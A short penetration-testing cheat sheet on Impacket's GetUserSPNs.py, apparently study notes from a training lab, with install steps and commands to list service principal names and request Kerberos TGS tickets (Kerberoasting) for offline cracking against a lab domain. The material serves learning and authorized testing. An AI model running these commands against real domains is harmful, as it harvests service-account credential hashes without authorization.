Skip to content

GetUserSPNs.py

Installation

Install Impacket from: https://github.com/fortra/impacket

1
2
3
git clone https://github.com/fortra/impacket
cd impacket
sudo python3 -m pip install .

Basic commands

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
# Gather a listing of SPNs in the domain.
GetUserSPNs.py -dc-ip $ip $domain/$username
# Example:
# GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend


# Requesting all TGS Tickets
GetUserSPNs.py -dc-ip $ip $domain/$username -request 
# Example:
# GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request 

# Request a single TGS ticket:
GetUserSPNs.py -dc-ip $ip $domain/$username -request-user $userrequested -outputfile file_tgs
# -outputfile:  to write the TGS tickets to a file 
# Example:
# GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request-user sqldev
Last update: 2024-12-27
Created: December 27, 2024 22:00:41